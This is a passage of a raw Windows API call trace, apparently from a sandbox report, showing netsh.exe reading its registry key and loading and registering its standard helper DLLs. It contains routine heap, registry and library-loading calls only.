(HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2921d0 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2921f0 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x292210 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x292230 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x292250 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x292270 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x292290 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2922b0 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2922d0 [0126.900] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0126.900] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0126.900] GetProcessHeap () returned 0x270000 [0126.900] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x28) returned 0x28e030 [0126.900] GetProcessHeap () returned 0x270000 [0126.900] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x2) returned 0x292860 [0126.900] GetProcessHeap () returned 0x270000 [0126.900] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x14) returned 0x2922f0 [0126.900] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0126.900] GetProcessHeap () returned 0x270000 [0126.900] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0126.900] GetProcessHeap () returned 0x270000 [0126.900] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x58) returned 0x292880 [0126.900] GetProcessHeap () returned 0x270000 [0126.900] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0126.900] GetProcessHeap () returned 0x270000 [0126.900] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xb0) returned 0x2928e0 [0126.900] GetProcessHeap () returned 0x270000 [0126.900] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292880 | out: hHeap=0x270000) returned 1 [0126.901] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x247668 | out: phkResult=0x247668*=0x90) returned 0x0 [0126.901] RegQueryInfoKeyW (in: hKey=0x90, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x247690, lpcbMaxValueNameLen=0x2476a0, lpcbMaxValueLen=0x247698, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x247690*=0x15, lpcbMaxValueNameLen=0x2476a0, lpcbMaxValueLen=0x247698, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0126.901] GetProcessHeap () returned 0x270000 [0126.901] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16) returned 0x292310 [0126.901] GetProcessHeap () returned 0x270000 [0126.901] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x23) returned 0x28e060 [0126.901] RegEnumValueW (in: hKey=0x90, dwIndex=0x0, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="4", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0126.901] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0126.901] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0126.901] GetProcessHeap () returned 0x270000 [0126.901] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x50) returned 0x292880 [0126.901] GetProcessHeap () returned 0x270000 [0126.901] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x4) returned 0x2929a0 [0126.901] GetProcessHeap () returned 0x270000 [0126.901] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1a) returned 0x28e090 [0126.901] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0126.901] GetProcessHeap () returned 0x270000 [0126.901] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28e030 | out: hHeap=0x270000) returned 1 [0126.901] LoadLibraryW (lpLibFileName="RASMONTR.DLL") returned 0x7fef2f70000 [0133.437] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x247060 | out: lpSystemTimeAsFileTime=0x247060*(dwLowDateTime=0xe7107e0, dwHighDateTime=0x1d68bad)) [0133.437] GetCurrentProcessId () returned 0xaa8 [0133.438] GetCurrentThreadId () returned 0xbd0 [0133.438] GetTickCount () returned 0x11556c8 [0133.438] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x247068 | out: lpPerformanceCount=0x247068*=25371390833) returned 1 [0133.441] LoadLibraryA (lpLibFileName=0x7fef2f10318) returned 0x7fefdee0000 [0133.443] GetVersion () returned 0x1db10106 [0133.443] SetErrorMode (uMode=0x0) returned 0x0 [0133.443] SetErrorMode (uMode=0x8001) returned 0x0 [0133.445] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x294330 [0133.445] LocalFree (hMem=0x294330) returned 0x0 [0133.445] GetVersion () returned 0x1db10106 [0133.446] GlobalLock (hMem=0x8b0008) returned 0x294330 [0133.455] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x294550 [0133.455] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x293050 [0133.455] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x292330 [0133.455] malloc (_Size=0x100) returned 0x4f7bd0 [0133.455] __dllonexit () returned 0x7fef2ed621c [0133.455] __dllonexit () returned 0x7fef2ed66e0 [0133.457] __dllonexit () returned 0x7fef2ed72b8 [0133.457] __dllonexit () returned 0x7fef2ed87cc [0133.457] __dllonexit () returned 0x7fef2ed8d64 [0133.457] __dllonexit () returned 0x7fef2ed8db4 [0133.457] __dllonexit () returned 0x7fef2ed8e70 [0133.457] __dllonexit () returned 0x7fef2eda308 [0133.457] __dllonexit () returned 0x7fef2ed8810 [0133.458] __dllonexit () returned 0x7fef2ee7598 [0133.458] __dllonexit () returned 0x7fef2ed8880 [0133.458] __dllonexit () returned 0x7fef2eda170 [0133.459] __dllonexit () returned 0x7fef2eda280 [0133.459] __dllonexit () returned 0x7fef2edad44 [0133.459] __dllonexit () returned 0x7fef2edbc30 [0133.459] __dllonexit () returned 0x7fef2edbc80 [0133.459] __dllonexit () returned 0x7fef2edc338 [0133.459] __dllonexit () returned 0x7fef2edd030 [0133.459] __dllonexit () returned 0x7fef2ed59cc [0133.459] __dllonexit () returned 0x7fef2ed59f0 [0133.459] __dllonexit () returned 0x7fef2ed5a1c [0133.461] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc0fc [0133.465] __dllonexit () returned 0x7fef2ee7568 [0133.465] __dllonexit () returned 0x7fef2ee7574 [0133.465] __dllonexit () returned 0x7fef2ee7580 [0133.466] __dllonexit () returned 0x7fef2ee758c [0133.466] GetVersion () returned 0x1db10106 [0133.466] GetVersion () returned 0x1db10106 [0133.466] GetVersion () returned 0x1db10106 [0133.466] __dllonexit () returned 0x7fef2e3a15c [0133.466] __dllonexit () returned 0x7fef2e46610 [0133.466] __dllonexit () returned 0x7fef2ed8910 [0133.466] __dllonexit () returned 0x7fef2ed8b90 [0133.466] __dllonexit () returned 0x7fef2ed8bb4 [0133.466] __dllonexit () returned 0x7fef2e56ae0 [0133.467] GetVersion () returned 0x1db10106 [0133.467] GetProcessVersion (ProcessId=0x0) returned 0x60001 [0133.489] GetSystemMetrics (nIndex=11) returned 32 [0133.489] GetSystemMetrics (nIndex=12) returned 32 [0133.489] GetSystemMetrics (nIndex=2) returned 17 [0133.489] GetSystemMetrics (nIndex=3) returned 17 [0133.489] GetDC (hWnd=0x0) returned 0x50109ca [0133.489] GetDeviceCaps (hdc=0x50109ca, index=88) returned 96 [0133.489] GetDeviceCaps (hdc=0x50109ca, index=90) returned 96 [0133.489] ReleaseDC (hWnd=0x0, hDC=0x50109ca) returned 1 [0133.490] GetSysColor (nIndex=15) returned 0xf0f0f0 [0133.490] GetSysColor (nIndex=16) returned 0xa0a0a0 [0133.490] GetSysColor (nIndex=20) returned 0xffffff [0133.490] GetSysColor (nIndex=18) returned 0x0 [0133.490] GetSysColor (nIndex=6) returned 0x646464 [0133.490] GetSysColorBrush (nIndex=15) returned 0x1100059 [0133.490] GetSysColorBrush (nIndex=6) returned 0x1100061 [0133.490] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0133.490] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0133.490] __dllonexit () returned 0x7fef2ed8f84 [0133.490] RegisterClipboardFormatW (lpszFormat=0x7fef2efbd60) returned 0xc0fd [0133.510] __dllonexit () returned 0x7fef2e63990 [0133.510] RegisterClipboardFormatW (lpszFormat=0x7fef2effd18) returned 0xc004 [0133.512] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0133.512] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0133.512] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0133.512] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0133.512] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0133.512] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0133.512] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0133.512] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0133.512] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0133.512] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc0b1 [0133.512] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc0b7 [0133.512] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0133.513] __dllonexit () returned 0x7fef2ee75a4 [0133.513] __dllonexit () returned 0x7fef2ee75bc [0133.513] __dllonexit () returned 0x7fef2ee75c8 [0133.513] __dllonexit () returned 0x7fef2ee75d4 [0133.514] __dllonexit () returned 0x7fef2ee75e0 [0133.514] GetCursorPos (in: lpPoint=0x7fef2f426d8 | out: lpPoint=0x7fef2f426d8*(x=61, y=120)) returned 1 [0133.515] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x2948a0 [0133.515] LocalReAlloc (hMem=0x292330, uBytes=0x18, uFlags=0x2) returned 0x2949b0 [0133.515] GetCurrentThread () returned 0xfffffffffffffffe [0133.515] GetCurrentThreadId () returned 0xbd0 [0133.515] __dllonexit () returned 0x7fef2edcfa4 [0133.515] SetErrorMode (uMode=0x0) returned 0x8001 [0133.515] SetErrorMode (uMode=0x8001) returned 0x0 [0133.516] GetModuleFileNameW (in: hModule=0x7fef2e20000, lpFilename=0x246750, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MFC42u.dll" (normalized: "c:\\windows\\system32\\mfc42u.dll")) returned 0x1e [0133.516] wcscpy_s (in: _Destination=0x246960, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0133.518] FindResourceW (hModule=0x7fef2e20000, lpName=0xe01, lpType=0x6) returned 0x1409b0 [0133.811] LoadStringW (in: hInstance=0x7fef2e20000, uID=0xe000, lpBuffer=0x246b70, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0133.811] wcscpy_s (in: _Destination=0x246784, _SizeInWords=0x5, _Source=0x7fef2efe630 | out: _Destination=".HLP") returned 0x0 [0133.811] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0133.813] malloc (_Size=0x80) returned 0x4f7e00 [0133.814] LocalAlloc (uFlags=0x40, uBytes=0x2100) returned 0x2949d0 [0133.814] GetSystemDirectoryA (in: lpBuffer=0x246df0, uSize=0x112 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.814] strcat_s (in: _Destination="C:\\Windows\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\Windows\\system32\\MFC42") returned 0x0 [0133.814] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\Windows\\system32\\MFC42LOC") returned 0x0 [0133.814] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\Windows\\system32\\MFC42LOC.DLL") returned 0x0 [0133.814] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0133.827] GetProcAddress (hModule=0x7fef2f70000, lpProcName="InitHelperDll") returned 0x7fef2f8cf70 [0133.827] InitHelperDll () returned 0x0 [0133.827] RegisterHelper () returned 0x0 [0133.827] GetProcessHeap () returned 0x270000 [0133.827] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x108) returned 0x296ae0 [0133.828] GetProcessHeap () returned 0x270000 [0133.828] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2928e0 | out: hHeap=0x270000) returned 1 [0133.828] RegisterHelper () returned 0x0 [0133.828] GetProcessHeap () returned 0x270000 [0133.828] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x160) returned 0x296bf0 [0133.829] GetProcessHeap () returned 0x270000 [0133.829] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x296ae0 | out: hHeap=0x270000) returned 1 [0133.829] RegisterHelper () returned 0x0 [0133.829] GetProcessHeap () returned 0x270000 [0133.829] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1b8) returned 0x296d60 [0133.829] GetProcessHeap () returned 0x270000 [0133.829] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x296bf0 | out: hHeap=0x270000) returned 1 [0133.829] RegisterHelper () returned 0x0 [0133.829] GetProcessHeap () returned 0x270000 [0133.829] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x210) returned 0x296ae0 [0133.829] GetProcessHeap () returned 0x270000 [0133.829] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x296d60 | out: hHeap=0x270000) returned 1 [0133.829] RegisterHelper () returned 0x0 [0133.829] GetProcessHeap () returned 0x270000 [0133.829] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x268) returned 0x296d00 [0133.829] GetProcessHeap () returned 0x270000 [0133.829] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x296ae0 | out: hHeap=0x270000) returned 1 [0133.829] RegEnumValueW (in: hKey=0x90, dwIndex=0x1, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="nshwfp", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0133.830] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0133.830] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0133.830] GetProcessHeap () returned 0x270000 [0133.830] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x78) returned 0x2928e0 [0133.830] GetProcessHeap () returned 0x270000 [0133.830] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xe) returned 0x292330 [0133.830] GetProcessHeap () returned 0x270000 [0133.830] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x16) returned 0x292350 [0133.830] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0133.830] GetProcessHeap () returned 0x270000 [0133.830] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292880 | out: hHeap=0x270000) returned 1 [0133.830] LoadLibraryW (lpLibFileName="NSHWFP.DLL") returned 0x7fef91b0000 [0135.727] GetProcAddress (hModule=0x7fef91b0000, lpProcName="InitHelperDll") returned 0x7fef921b6d0 [0135.727] InitHelperDll () returned 0x0 [0135.734] RegisterHelper () returned 0x0 [0135.734] GetProcessHeap () returned 0x270000 [0135.734] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x2c0) returned 0x2a0ea0 [0135.734] GetProcessHeap () returned 0x270000 [0135.734] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x296d00 | out: hHeap=0x270000) returned 1 [0135.734] RegEnumValueW (in: hKey=0x90, dwIndex=0x2, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="dhcpclient", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0135.734] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0135.734] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0135.734] GetProcessHeap () returned 0x270000 [0135.734] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xa0) returned 0x296d00 [0135.734] GetProcessHeap () returned 0x270000 [0135.734] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x16) returned 0x292370 [0135.734] GetProcessHeap () returned 0x270000 [0135.734] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x22) returned 0x297330 [0135.734] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0135.734] GetProcessHeap () returned 0x270000 [0135.734] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2928e0 | out: hHeap=0x270000) returned 1 [0135.734] LoadLibraryW (lpLibFileName="DHCPCMONITOR.DLL") returned 0x7fef91a0000 [0138.415] GetProcAddress (hModule=0x7fef91a0000, lpProcName="InitHelperDll") returned 0x7fef91a1a40 [0138.416] InitHelperDll () returned 0x0 [0138.416] RegisterHelper () returned 0x0 [0138.416] GetProcessHeap () returned 0x270000 [0138.416] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x318) returned 0x2a5e30 [0138.416] GetProcessHeap () returned 0x270000 [0138.416] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a0ea0 | out: hHeap=0x270000) returned 1 [0138.416] RegEnumValueW (in: hKey=0x90, dwIndex=0x3, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="wshelper", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0138.416] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0138.416] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0138.416] GetProcessHeap () returned 0x270000 [0138.416] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xc8) returned 0x2a0ea0 [0138.416] GetProcessHeap () returned 0x270000 [0138.416] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x12) returned 0x2a35e0 [0138.416] GetProcessHeap () returned 0x270000 [0138.416] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1a) returned 0x2a15f0 [0138.416] _wcsupr (in: _String="wshelper.dll" | out: _String="WSHELPER.DLL") returned="WSHELPER.DLL" [0138.416] GetProcessHeap () returned 0x270000 [0138.416] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x296d00 | out: hHeap=0x270000) returned 1 [0138.417] LoadLibraryW (lpLibFileName="WSHELPER.DLL") returned 0x7fef33e0000 [0139.546] GetProcAddress (hModule=0x7fef33e0000, lpProcName="InitHelperDll") returned 0x7fef33e1720 [0139.546] InitHelperDll () returned 0x0 [0139.553] RegisterHelper () returned 0x0 [0139.553] GetProcessHeap () returned 0x270000 [0139.553] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x370) returned 0x2a6ba0 [0139.553] GetProcessHeap () returned 0x270000 [0139.553] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a5e30 | out: hHeap=0x270000) returned 1 [0139.553] RegEnumValueW (in: hKey=0x90, dwIndex=0x4, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="nshhttp", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0139.553] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0139.553] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0139.553] GetProcessHeap () returned 0x270000 [0139.553] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xf0) returned 0x2a5e30 [0139.553] GetProcessHeap () returned 0x270000 [0139.553] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2a3600 [0139.553] GetProcessHeap () returned 0x270000 [0139.553] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2a3620 [0139.553] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0139.553] GetProcessHeap () returned 0x270000 [0139.553] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a0ea0 | out: hHeap=0x270000) returned 1 [0139.553] LoadLibraryW (lpLibFileName="NSHHTTP.DLL") returned 0x7fef33d0000 [0142.555] GetProcAddress (hModule=0x7fef33d0000, lpProcName="InitHelperDll") returned 0x7fef33d1c24 [0142.555] InitHelperDll () returned 0x0 [0142.555] RegisterHelper () returned 0x0 [0142.555] GetProcessHeap () returned 0x270000 [0142.556] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x3c8) returned 0x2a6f20 [0142.556] GetProcessHeap () returned 0x270000 [0142.556] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a6ba0 | out: hHeap=0x270000) returned 1 [0142.556] RegEnumValueW (in: hKey=0x90, dwIndex=0x5, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="fwcfg", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0142.556] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0142.556] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0142.556] GetProcessHeap () returned 0x270000 [0142.556] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x118) returned 0x2a5f30 [0142.556] GetProcessHeap () returned 0x270000 [0142.556] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xc) returned 0x2a3640 [0142.556] GetProcessHeap () returned 0x270000 [0142.556] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x14) returned 0x2a3660 [0142.556] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0142.556] GetProcessHeap () returned 0x270000 [0142.556] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a5e30 | out: hHeap=0x270000) returned 1 [0142.556] LoadLibraryW (lpLibFileName="FWCFG.DLL") returned 0x7fef33a0000 [0145.254] GetProcAddress (hModule=0x7fef33a0000, lpProcName="InitHelperDll") returned 0x7fef33a2d20 [0145.254] InitHelperDll () returned 0x0 [0145.254] RegisterHelper () returned 0x0 [0145.254] GetProcessHeap () returned 0x270000 [0145.254] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x420) returned 0x2ab2f0 [0145.254] GetProcessHeap () returned 0x270000 [0145.254] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a6f20 | out: hHeap=0x270000) returned 1 [0145.254] RegEnumValueW (in: hKey=0x90, dwIndex=0x6, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="authfwcfg", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0145.255] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0145.255] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0145.255] GetProcessHeap () returned 0x270000 [0145.255] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x140) returned 0x2a6ba0 [0145.255] GetProcessHeap () returned 0x270000 [0145.255] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x14) returned 0x2a36a0 [0145.255] GetProcessHeap () returned 0x270000 [0145.255] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1c) returned 0x2a6720 [0145.255] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0145.255] GetProcessHeap () returned 0x270000 [0145.255] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a5f30 | out: hHeap=0x270000) returned 1 [0145.255] LoadLibraryW (lpLibFileName="AUTHFWCFG.DLL") returned 0x7fef3160000 [0150.108] GetProcAddress (hModule=0x7fef3160000, lpProcName="InitHelperDll") returned 0x7fef3165d20 [0150.108] InitHelperDll () returned 0x0 [0150.956] RegisterHelper () returned 0x0 [0150.956] GetProcessHeap () returned 0x270000 [0150.956] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x478) returned 0x2ae740 [0150.956] GetProcessHeap () returned 0x270000 [0150.956] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ab2f0 | out: hHeap=0x270000) returned 1 [0150.956] RegisterHelper () returned 0x0 [0150.956] GetProcessHeap () returned 0x270000 [0150.956] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x4d0) returned 0x2aebc0 [0150.957] GetProcessHeap () returned 0x270000 [0150.957] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ae740 | out: hHeap=0x270000) returned 1 [0150.957] RegisterHelper () returned 0x0 [0150.957] GetProcessHeap () returned 0x270000 [0150.957] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x528) returned 0x2af0a0 [0150.957] GetProcessHeap () returned 0x270000 [0150.957] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2aebc0 | out: hHeap=0x270000) returned 1 [0150.957] RegisterHelper () returned 0x0 [0150.957] GetProcessHeap () returned 0x270000 [0150.957] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x580) returned 0x2ae740 [0150.957] GetProcessHeap () returned 0x270000 [0150.957] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2af0a0 | out: hHeap=0x270000) returned 1 [0150.957] RegisterHelper () returned 0x0 [0150.957] GetProcessHeap () returned 0x270000 [0150.957] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x5d8) returned 0x2aecd0 [0150.957] GetProcessHeap () returned 0x270000 [0150.957] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ae740 | out: hHeap=0x270000) returned 1 [0150.957] RegEnumValueW (in: hKey=0x90, dwIndex=0x7, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="2", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0150.958] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0150.958] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0150.958] GetProcessHeap () returned 0x270000 [0150.958] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x168) returned 0x2a7140 [0150.958] GetProcessHeap () returned 0x270000 [0150.958] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x4) returned 0x2a72b0 [0150.958] GetProcessHeap () returned 0x270000 [0150.958] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x14) returned 0x2ae170 [0150.958] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0150.958] GetProcessHeap () returned 0x270000 [0150.958] 